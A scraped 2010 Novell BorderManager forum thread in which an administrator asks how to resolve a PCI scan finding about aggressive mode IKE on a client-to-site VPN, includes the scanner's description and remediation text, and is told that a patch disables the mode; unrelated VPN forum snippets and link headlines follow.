NMAS, NDS, VPN and PCI compliance

Long story short, our last PCI compliance scan came back with a failed
item. We're using BM 3.9sp2. VPN is using NMAS authentication, NDS
sequence for Client-to-site VPN.

The failed item references CVE-2002-1623 in regard to aggressive mode
IKE and suggests we set the mode to normal -or- appeal the finding.
Their words are, " If you already have a strong password policy for the
PSKs, then you can appeal this vulnerability."

So I guess my questions are

1) can the IKE mode be changed? I've looked in iManager and don't see
anything obvious.

2) I don't see any settings for managing PSKs for client-to-site VPN
settings. What/where are the Pre-shared keys for client-to-site VPN? Are
they even used for client-to-site? 

3) Would anyone have any experiences they'd like to share in dealing
with these PCI issues?

Any Hints or suggestions would be much apprecieated!
Thanks!
~Daniel

Here is verbatim scan description and remediation text:

description:
The remote host is a VPN concentrator that supports Aggressive mode
IKE. By creating a series of IKE aggressive mode proposals, and sending
those proposals to the VPN concentrator, an acceptable proposal for
Aggressive Mode IKE was discovered. In Aggressive Mode IKE, the response
from the VPN concentrator includes an authentication hash based on a
pre-shared key (PSK). This hash is not encrypted, so if it is captured
in transit, a dictionary or brute force attack against the hash can
potentially allow for the recovery of the PSK, and the exposure
potentially sensitive information from VPN sessions. In rare cases where
the PSK is the sole means for authentication to the VPN, attackers can
use it to authenticate against the VPN and intrude the network.

remediation:
The first option is to disable Aggressive Mode IKE for the VPN
Concentrator. Sometimes, the ability to disable Aggressive Mode IKE
isn't an option until later versions of the software, so ensure that the
VPN Concentrator is using the latest software version. If you are unable
to disable Aggressive Mode IKE, then you should ensure that the
pre-shared keys are strong. Like any password, be sure to use complex
PSK values, and rotate the keys as often as is practical. These are
recommended to be an alphanumeric value greater than 16 characters. If
you already have a strong password policy for the PSKs, then you can
appeal this vulnerability.

CVE Code:
CVE-2002-1623

Evidence:
Encryption: DES, Hash: MD5, Auth Mode: Pre-Shared Key, DH Group:
Diffie-Hellman Group 1
Encryption: DES, Hash: MD5, Auth Mode: Pre-Shared Key, DH Group:
Diffie-Hellman Group 2
Encryption: DES, Hash: MD5, Auth Mode: RSA Signatures, DH Group:
Diffie-Hellman Group 1
Encryption: DES, Hash: MD5, Auth Mode: RSA Signatures, DH Group:
Diffie-Hellman Group 2
Encryption: DES, Hash: SHA1, Auth Mode: Pre-Shared Key, DH Group:
Diffie-Hellman Group 1
Encryption: DES, Hash: SHA1, Auth Mode: Pre-Shared Key, DH Group:
Diffie-Hellman Group 2
Encryption: DES, Hash: SHA1, Auth Mode: RSA Signatures, DH Group:
Diffie-Hellman Group 1
Encryption: DES, Hash: SHA1, Auth Mode: RSA Signatures, DH Group:
Diffie-Hellman Group 2
Encryption: Triple-DES, Hash: MD5, Auth Mode: Pre-Shared Key, DH Group:
Diffie-Hellman Group 1
Encryption: Triple-DES, Hash: MD5, Auth Mode: Pre-Shared Key, DH Group:
Diffie-Hellman Group 2
Encryption: Triple-DES, Hash: MD5, Auth Mode: RSA Signatures, DH Group:
Diffie-Hellman Group 1
Encryption: Triple-DES, Hash: MD5, Auth Mode: RSA Signatures, DH Group:
Diffie-Hellman Group 2
Encryption: Triple-DES, Hash: SHA1, Auth Mode: Pre-Shared Key, DH
Group: Diffie-Hellman Group 1
Encryption: Triple-DES, Hash: SHA1, Auth Mode: Pre-Shared Key, DH
Group: Diffie-Hellman Group 2
Encryption: Triple-DES, Hash: SHA1, Auth Mode: RSA Signatures, DH
Group: Diffie-Hellman Group 1
Encryption: Triple-DES, Hash: SHA1, Auth Mode: RSA Signatures, DH
Group: Diffie-Hellman Group 2


-- 
dshockle
------------------------------------------------------------------------



0
dshockle
12/15/2010 1:06:01 AM
novell.bordermanager.vpn 2677 articles. 0 followers. Follow

5 Replies
735 Views

Similar Articles

[PageSpeed] 12

On 15-12-2010 2:06, dshockle wrote:
>
> Long story short, our last PCI compliance scan came back with a failed
> item. We're using BM 3.9sp2. VPN is using NMAS authentication, NDS
> sequence for Client-to-site VPN.
>
> The failed item references CVE-2002-1623 in regard to aggressive mode
> IKE and suggests we set the mode to normal -or- appeal the finding.



fixed in bm39sp2_ir1. Aggressive mode can be disable after applying this 
patch

0
mysterious
12/15/2010 7:19:43 AM
Thank You for the reply!


-- 
dshockle
------------------------------------------------------------------------
dshockle's Profile: http://forums.novell.com/member.php?userid=38359
View this thread: http://forums.novell.com/showthread.php?t=428127

0
dshockle
12/15/2010 3:06:02 PM
On 15/12/10 16:06, dshockle wrote:
>
> Thank You for the reply!
>
>

u welcome. Clarification, after applying bm39sp2_ir1, aggressive mode is 
disable by default.
0
Mysterious
12/15/2010 3:08:42 PM
for my own edification, where can I view this setting? I'm trying to
find documentation but not having much luck.


-- 
dshockle
------------------------------------------------------------------------
dshockle's Profile: http://forums.novell.com/member.php?userid=38359
View this thread: http://forums.novell.com/showthread.php?t=428127

0
dshockle
12/15/2010 4:06:02 PM
On 15/12/10 17:06, dshockle wrote:
>
> for my own edification, where can I view this setting? I'm trying to
> find documentation but not having much luck.
>
>

monitor, server parameters, communication.
0
Mysterious
12/15/2010 4:08:09 PM
Reply:

Similar Artilces:

Bordermanager vpn vs Cisco router vpn etc
I have a small client with a Novell 5.x server with about 35 clients, many of which are needing some sort of vpn access. Trying to figure out if it is easier to setup border manager for vpn access on the server or simply get a router that will provide vpn access. Which would be easier or more cost effective in this scenario over a dsl connection. Any suggestions or comments are appreciated. Thanks Paul I guess it depends a lot on cost. Do you already have BMgr? (A copy that includes client-site VPN?) If so, just install that and configure it. As for using ...

legacy vpn + new vpn
Hi, I am running a bordermanager nw6 3.7 server configured as a master vpn server. The slave is also a nw6 3.7 server and is in another country. Now we need to put another slave to this vpn, however w'd like to do that with bordermanager 3.8. The question is if we update this server from 3.7 to 3.8, will the legacy vpn run without a problem, while 3.7 on the other side is running. (I think this will be no problem, correct me if I am wrong) On the other hand I want to configure a new master vpn on the same server by use of imanager. The other slave will be the new company. I...

BorderManager VPN
Hi, I have a customer who is looking for a VPN solution (No more details yet...) Anyhow they have Border Manager 3.8 for proxy. However another site of theirs uses ISA. I know very little about either products. and would like to know peoples views? is BM a good product for VPN, are their better 3rd Party products? Thanks Hi, I use BM vpns all over the place & rate them highly. The 3.8 release was a major step forward as we now use the ipsec standard for site to site transport & can now talk to any other industry standard ipsec vpn endpoint. Client to...

VPN
Where might I find/configure a log of who connects to our VPN, whether or not they login to Netware once connected, etc. The login to Netware portion is relatively unimportant, but I would like to track basic information like remote IP, username, connect time, disconnect time, etc. Netware 6.5, BorderManager 3.8/SP4/IR3. Client is 3.8.11 for all remote users. We currently have two working VPNs - different servers, different OU's. TIA. -S- I don't know if this has changed in later versions of BM but this is how I monitor activity in BM 3.7. Open NWADM...

vpn to vpn connection question
Hello: I've been asked to look into a vpn to vpn connection with a third party vpn server connection to our bm38sp2 vpn. Last week I had asked if this was possible and the answer was yes (but). Currently I have our vpn up and running to allow me secure access from home for remote management. The vpn is setup as the master vpn server. Now, if I try to connect to a third party vpn, will our server be a client in this case (I assume so)? If so, how does this impact our current setup as a master server? Thanks in advance, Chris. PS. Others have suggested (strongly) to si...

VPN
I have BM 3.7, I can authenticate, but can't log in to Netware "Tree or server can't be found". Thank you Craig If you add an entry for the server to your local HOSTS file, does it work? -- Lance Reynolds, CNE I can use VPN fine when I connect to BM from the same subnet(I have a switch on the public side with a test box), however when I try from dialin or on broadband/ADSL from another subnet I get tree or server can not be found. At the moment we are only using BM for VPN. Thank you Cheers Craig Craig, Ok, but the pro...

VPN
If I'm using VPN on an unsecured wireless connection can someone see my files if I have file sharing on? It depends on the VPN service, if you are using the Standard Sharing Ports & they are not Encrypted Everyone can see all your files & gain access to them. Check the information on the VPN Service First! "lbc" <ghost@whatever.com> wrote in message news:dlv8cv$8eh$1@news.grc.com... > If I'm using VPN on an unsecured wireless connection can someone see my > files if I have file sharing on? > > ...

VPN
We are currently using a Cisco VPN 5001 concentrator authenticating to a Cisco Secure Radius Server. I do not manage this hardware/software. I authenticate just fine to the organization itself but as in any organization, the organization spans multiple subnets, networks, etc. The dilemma I am having is logging into my server once I get authenticated. I have a Novell client installed but I cannot login to the server because it does not find it -- here I'm listing the server name, server tree and context. I've also tried mapping drives to the server by IP addres...

VPN
I am about to install VPN services with BorderManager 3.8 and have been reading some of the documentation. Can someone please explain to me the concept of tunneling and it's implementation with BM as this seems to be one of steps to setting up VPN. Any help is appreciated, as this concept is very new to me. Cheers, hi, tunneling is a process for which IP packets are encapsulated within some other protocol at one end of the VPN (like a wrapping that hides a gift, so the recipient cannot tell what's inside), transmitted over the internet to the other end of the VP...

vpn
pcanywhere?!?!?! what kind of encryption does that do? not much AFAIK best to use something that encrypts the traffic I have an SME server (e-smith.org Linux) on my cable modem that is my firewall, webserver, email server, router, NAT, etc.... Been using for years, no problems, very secure. The SME has pptp VPN (128bit) built in. works like a charm, (not as secure as 3DES) I routinely nmap my home server and my work server running checkpoint and my home server gets a higher difficulty rating, much higher, FWIW. you could then use pcanywhere thru the tunnel, this is how I ssh into...

VPN
I am using a Sonicwall for VPN connectivity. We are using NetWare 6.5. Can someone please point me to a TID that will explain all the necessary things I need to do to get my remote client to connect to the NetWare servers. Border Manager is NOT being used at all in this environment. thanks On 5/17/2005 dlorenzen@vtg.biz wrote: > I am using a Sonicwall for VPN connectivity. We are using NetWare 6.5. > Can someone please point me to a TID that will explain all the necessary > things I need to do to get my remote client to connect to the NetWare > servers...

vpn
hi i setup my vpn connection i setup it on desktop pc and connected successfully i setup it on laptop(dell inspiron 1520) as like as my desktop and connected but i didn't have any receive what can i do? -- morteza13581358 ------------------------------------------------------------------------ I am not entirely sure what you are trying to get at. What kind of VPN did you try to set up? Is this Vpn on your local computer or in a remote location? -- ghostwind ------------------------------------------------------------------------ ghostwind's Profi...

vpn
hi i setup dsl connection on my laptop but i can't use it via kinternet kinternet don't show it what can i do? :( -- morteza13581358 ------------------------------------------------------------------------ Please see my post here. 'Bryan 手札 &#8212; 生活記趣 � Opensuse information' (http://lifestory.moqin.com/?cat=344) It will be able to help you. -- Regards, Bryan Yu http://lifestory.moqin.com/ ------------------------------------------------------------------------ df6269's Profile: http://forums.opensuse.org/member.php?userid=7...

VPN and iManager
--____QYNABXMVMFKNILQFHXTH____ Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: base64 Content-Disposition: inline; modification-date="Fri, 17 Jul 2008 15:28:53 +1000" SGksDQoNCldlIGp1c3QgaW5zdGFsbGVkIEJvcmRlck1hbmFnZXIgdjMuOSBTUDEgKHVwZ3JhZGUg ZnJvbSBCTSAzLjcpIGFuZCBhcmUgcnVubmluZyBpTWFuYWdlciAzLjYNCg0KSW4gaU1hbmFnZXIg djMuNiB3ZSBjYW4gc2VlIGFuZCBjb25maWd1cmUgQWNjZXNzIFJ1bGVzLCBQcm94eSwgZXRjIGJ1 dCB0aGUgVlBOIG9wdGlvbiBkb2VzIG5vdCBsaXN0IHVwLg0KDQpDb3VsZCBzb21lb25lIHBvc3Qg aG93IHRvIGdldCBWUE4gbGlzdGVkIGluIGlNYW5hZ2VyIHN1Y2Nlc3NmdWxseS4gVW5kZXIgSW5z dGFs...

Web resources about - NMAS, NDS, VPN and PCI compliance - novell.bordermanager.vpn

Compliance (medicine) - Wikipedia, the free encyclopedia
In medicine, compliance (also adherence , capacitance or Concordance ) describes the degree to which a patient correctly follows medical advice. ...

HootSuite Launches Managed Security And Compliance Services
... and social media assets comes from social relationship platform HootSuite , which announced the launch of its Managed Security and Compliance ...

Facebook looking for a little help with SOX compliance
According to a new Facebook job posting, the company is looking for someone to run their stock option plan who knows how to deal with the SEC ...

Thomson Reuters Governance, Risk and Compliance - LinkedIn
Thomson Reuters Governance, Risk & Compliance business delivers a comprehensive suite of solutions designed to empower audit, risk and compliance ...

Sen. Max Baucus admits the PPACA conditions tax credits on state compliance - YouTube
U.S. Senate Finance Committee chairman Max Baucus (D-MT) was the chief sponsor and lead author of his committee's health care bill, which ultimately ...

UAE banking industry to tighten compliance on advertising claims
There are also plans to create a website that would allow consumers to expose lenders that provide bad service and products.

Bridge Point-ControlScan partnership for PCI solutions - compliance, product, data security, Bridge Point ...
Bridge Point Communications has partnered with Atlanta-based payment security and compliance solutions provider, ControlScan, to produce a full ...

Tax Office culls compliance officials despite concern over corporate and multinational tax avoidance
Axe falls on compliance, debt collection as middle management culled.

ICC Urges Government Consultation to Counter Compliance Overload
... in the number, nature and content of ICT-related legal requirements since the mid-1990s have left many businesses wallowing in a complex "compliance ...

ACMA issues warnings for TCP code non-compliance - critical information summaries, Telecommunications ...
... and Sure Telecom for failing to make critical information summaries available (CIS) available to customers. “The ACMA expects industry compliance ...

Resources last updated: 12/2/2015 1:48:04 AM